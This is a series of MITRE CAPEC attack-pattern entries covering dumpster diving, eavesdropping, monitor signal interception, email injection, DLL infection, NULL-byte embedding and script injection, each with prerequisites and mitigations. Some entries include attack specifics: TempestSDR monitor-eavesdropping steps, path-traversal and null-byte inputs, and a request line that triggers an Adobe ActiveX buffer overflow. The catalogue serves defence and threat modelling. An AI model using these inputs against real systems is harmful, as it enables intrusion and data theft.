[REF-86] Ryan Naraine. "DoS Flaw in SOAP DTD Parameter". InternetNews.com. ITBusiness Edge, Quinstreet Inc.. 2003-12-15. <http://www.internetnews.com/dev-news/article.php/3289191>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Description, Description Summary, Solutions_and_Mitigations
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns

CAPEC-406: Dumpster Diving

Attack Pattern ID: 406

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	150	Collect Data from Common Resource Locations
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	163	Spear Phishing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	675	Retrieve Data from Decommissioned Devices

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

An adversary must have physical access to the dumpster or downstream processing facility.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Related Weaknesses

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary, Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Social Information Gathering via Dumpster Diving

CAPEC-651: Eavesdropping

Attack Pattern ID: 651

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	117	Interception
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	508	Shoulder Surfing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	634	Probe Audio and Video Peripherals
ParentOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	699	Eavesdropping on a Monitor

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary typically requires physical proximity to the target's environment, whether for physical eavesdropping or for placing recording equipment. This is not always the case for software-based eavesdropping, if the adversary has the capability to install malware on the target system that can activate a microphone and record audio digitally.

Resources Required

For logical eavesdropping, some equipment may be necessary (e.g., microphone, tape recorder, etc.). For physical eavesdropping, only proximity is required.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Mitigations

Be mindful of your surroundings when discussing sensitive information in public areas.

Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.

If possible, physically disable the microphone on your machine if it is not needed.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1111	Multi-Factor Authentication Interception

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-699: Eavesdropping on a Monitor

Attack Pattern ID: 699

Abstraction: Meta

View customized information:

Description

Extended Description

This attack gives the adversary the ability to view an external monitor with an insignificant delay. There is also no indicator of compromise from the victim visible on the monitor.

The eavesdrop is possible due to a signal leakage, that is produced at different points of the connection, including the source port, the connection between the cable and PC, the cable itself, and the connection between the cable and the monitor. That signal leakage can be captured near any of the leak points, but also in a near location, like the next room or a few meters away, using an SDR (Software-defined Radio) device and the correspondent software, that process and interpret the signal to show attackers what the monitor is displaying.

From the victim’s point of view, this specified attack might cause a high risk, and from the other hand, from the attacker’s point of view, the attack is excellent, since the specified attack method can be used without investing too much effort or require too many skills, as long as the right attack tool is in right place, this allows attackers to completely compromise the confidentiality of the data; also giving the attacker the advantage of being undetectable by not only traditional security products but also from bug sweep because the SDR device is acting in passive mode.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	651	Eavesdropping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Survey Target: The adversary surveys the target location, looking for exposed display cables and locations to hide an SDR. This also includes looking for display cables or monitors placed close to a wall, where the SDR can be in range while behind the wall. The adversary also attempts to discover the resolution and refresh rate of the targeted display.

Experiment

Find target using SDR: The adversary sets up an SDR near the target display cable or monitor. They use the SDR software to locate the corresponding frequency of the display cable. This is done by looking for interference peaks that change depending on what the screen is showing. The adversary notes down the possible frequencies of unintentional emission.
Techniques
An adversary can make use of many different commercially available SDR devices which are easy to setup such as a HackRF, Ubertooth, RTL-SDR, and many others.

Exploit

Visualize Monitor Image: Once the SDR software has been used to identify the target, the adversary will record the transmissions and visualize the monitor image using these transmissions, which allows them to eavesdrop on the information visible on the monitor.

Techniques

The TempestSDR software can be used in conjunction an SDR device to visualize the monitor image. The adversary will specify the known monitor resolution and refresh rate, or if those are not known they can use the provided auto-correlation graphs to help predict these values. The adversary will then try the different frequencies recorded from the experiment phase, looking for a viewing monitor display. Low pass filters and gain can be manipulated to make the display image clearer.

Prerequisites

Victim should use an external monitor device

Physical access to the target location and devices

Skills Required

[Level: Medium]

Knowledge of how to use the SDR and related software: With this knowledge, the adversary will find the correct frequency where the signal is being leaked

[Level: Low]

Understanding of computing hardware, to identify the video cable and video ports

Resources Required

SDR device set with the correspondent antenna

Computer with SDR Software

Indicators

The target will not observe any indicators of the attack from the computer user’s perspective. The only indication of this attack would be a visible SDR with antenna that can be seen in close proximity to a display cable which is not normally present. This requires that the target is aware of what SDRs look like and can recognize that it may be out of place.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Enhance: Increase the number of electromagnetic shield layers in the display ports and cables to contain or reduce the intensity of the leaked signal.

Implement: Use a protocol that encrypts the video signal; in case the signal is intercepted the signal is protected by the encryption.

Design: Lock away the video cables, making it difficult for the attacker to access the cables and place the antenna near them (If the distance condition between the antenna and display port/cable is not satisfied, the attack will not be possible).

Implement: Use wireless technologies to connect to external display devices.

Related Weaknesses

CWE-ID	Weakness Name
1300	Improper Protection of Physical Side Channels

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-744] "TempestSDR: An SDR Tool For Eavesdropping on Computer Screens Via Unintentionally Radiated RF". <https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-computer-screens-via-unintentionally-radiated-rf/>. URL validated: 2022-12-07.

[REF-745] Dan Maloney. "Exposing Computer Monitor Side-Channel Vulnerabilities with TempestSDR". <https://hackaday.com/2020/07/15/exposing-computer-monitor-side-channel-vulnerabilities-with-tempestsdr/>. URL validated: 2022-12-07.

Content History

Submissions
Submission Date	Submitter	Organization
2023-01-24 (Version 3.9)	You Wu (吴忧), Miguel Ivan Fernandez (伊万), Qingzhe Jiang (蒋青喆)	Lenovo
2023-01-24 (Version 3.9)

CAPEC-622: Electromagnetic Side-Channel Attack

Attack Pattern ID: 622

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	189	Black Box Reverse Engineering

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Proximal access to the device.

Skills Required

[Level: Medium]

Sophisticated attack, but detailed techniques published in the open literature.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Utilize side-channel resistant implementations of all crypto algorithms.

Strong physical security of all devices that contain secret key information. (even when devices are not in use)

Related Weaknesses

CWE-ID	Weakness Name
201	Insertion of Sensitive Information Into Sent Data

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences

CAPEC-134: Email Injection

Attack Pattern ID: 134

Abstraction: Standard

View customized information:

Description

An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol.

Extended Description

Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to "share this site with a friend" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an adversary adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an adversary can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	137	Parameter Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	41	Using Meta-characters in E-mail Headers to Inject Malicious Payloads

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target application must allow the user to send email to some recipient, to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.

The adversary must have the ability to access the target mail application.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
150	Improper Neutralization of Escape, Meta, or Control Sequences

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
30	Mail Command Injection

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Related_Attack_Patterns, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-448: Embed Virus into DLL

Attack Pattern ID: 448

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	442	Infected Software

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Mitigations

Leverage anti-virus products to detect and quarantine software with known virus.

Related Weaknesses

CWE-ID	Weakness Name
506	Embedded Malicious Code

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1027.009	Obfuscated Files or Information: Embedded Payloads

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses, Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	Malware Infection into Product Software

CAPEC-52: Embedding NULL Bytes

Attack Pattern ID: 52

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	267	Leverage Alternate Encoding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
Manually inspect the application to find entry points.

Experiment

Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the "Explore" phase as a target list and injects postfix null byte(s) to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.
Techniques
Try different encodings for null such as \0 or %00

Exploit

Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) such that they remove data after the null byte(s) in a way that is beneficial to them.
Techniques
If the input is a directory as part of a longer file path, add a null byte(s) at the end of the input to try to traverse to the given directory.

Prerequisites

The program does not properly handle postfix NULL terminators

Skills Required

[Level: Medium]

Directory traversal

[Level: High]

Execution of arbitrary code

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Properly handle the NULL characters supplied as part of user input prior to doing anything with the data.

Example Instances

Directory Browsing

Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an adversary could insert a bogus username such as ../../../../../WINDOWS. If the adversary needs to remove the trailing string /reports, then they can simply insert enough characters so the string is truncated. Alternatively the adversary might apply the postfix NULL character (%00) to determine whether this terminates the string.

Different forms of NULL to think about include

PATH%00
PATH[0x00]
PATH[alternate representation of NULL character]
<script></script>%00

Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.'s Acrobat/Acrobat Reader allows remote adversaries to execute arbitrary code.

The problem specifically exists upon retrieving a link of the following form:

GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1

Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a "file not found" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an adversary to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:

0x77F83AE5 MOV EAX,[EDI+8]
0x77F83AE8 MOV ECX,[EDI+C]
...
0x77F83AED MOV [ECX],EAX

The register EDI contains a pointer to a user-supplied string. The adversary therefore has control over both the ECX and EAX registers used in the shown MOV instruction.

Successful exploitation allows remote adversaries to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.

An adversary does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.

Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [REF-445].

CAPEC-19: Embedding Scripts within Scripts

Attack Pattern ID: 19

Abstraction: Standard

View customized information:

Description

Extended Description

The adversary must have the ability to inject their script into a script that is likely to be executed. If this is done, then the adversary can potentially launch a variety of probes and attacks against the web server's local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an adversary can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. These attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	242	Code Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Spider: Using a browser or an automated tool, an adversary records all entry points for inputs that happen to be reflected in a client-side script element. These script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.

Techniques
Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.
Use a proxy tool to record all links visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

Probe identified potential entry points for XSS vulnerability: The adversary uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

Techniques
Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.
Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.
Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.
Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.
Use a proxy tool to record results of the created requests.

Exploit

Steal session IDs, credentials, page content, etc.: As the adversary succeeds in exploiting the vulnerability, they can choose to steal user's credentials in order to reuse or to analyze them later on.

Techniques
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the adversary.
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an adversary's server and then causes the browser to execute appropriately.

Forceful browsing: When the adversary targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).

Techniques
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an adversary's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).

Content spoofing: By manipulating the content, the adversary targets the information that the user would like to get from the website.

Techniques
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes adversary-modified invalid information to the user on the current web page.

Prerequisites

Target software must be able to execute scripts, and also grant the adversary privilege to write/upload scripts.

Skills Required

[Level: Low]

To load malicious script into open, e.g. world writable directory

[Level: Medium]

Executing remote scripts on host and collecting output

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Use browser technologies that do not allow client side scripting.

Utilize strict type, character, and encoding enforcement.

Server side developers should not proxy content via XHR or other means. If a HTTP proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.

Ensure all content that is delivered to client is sanitized against an acceptable content specification.

Perform input validation for all remote content.

Perform output validation for all remote content.

Disable scripting languages such as JavaScript in browser

Session tokens for specific host

Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.

Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode

Example Instances

Ajax applications enable rich functionality for browser based web applications. Applications like Google Maps deliver unprecedented ability to zoom in and out, scroll graphics, and change graphic presentation through Ajax. The security issues that an adversary may exploit in this instance are the relative lack of security features in JavaScript and the various browser's implementation of JavaScript, these security gaps are what XSS and a host of other client side vulnerabilities are based on. While Ajax may not open up new security holes, per se, due to the conversational aspects between client and server of Ajax communication, attacks can be optimized. A single zoom in or zoom out on a graphic in an Ajax application may round trip to the server dozens of times. One of the first steps many adversarys take is frequently footprinting an environment, this can include scanning local addresses like 192.*.*.* IP addresses, checking local directories, files, and settings for known vulnerabilities, and so on.

The XSS script that is embedded in a given IMG tag can be manipulated to probe a different address on every click of the mouse or other motions that the Ajax application is aware of.

In addition the enumerations allow for the adversary to nest sequential logic in the attacks. While Ajax applications do not open up brand new attack vectors, the existing attack vectors are more than adequate to execute attacks, and now these attacks can be optimized to sequentially execute and enumerate host environments.

~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1027.009	Obfuscated Files or Information: Embedded Payloads
1546.004	Event Triggered Execution:.bash_profile and .bashrc
1546.016	Event Triggered Execution: Installer Packages

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Prerequisites, Description Summary, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Examples-Instances, References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Execution_Flow, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Execution_Flow, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Taxonomy_Mappings

CAPEC CATEGORY: Employ Probabilistic Techniques

Category ID: 223

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	28	Fuzzing
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	112	Brute Force

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Relationships
Previous Entry Names
Change Date	Previous Entry Name
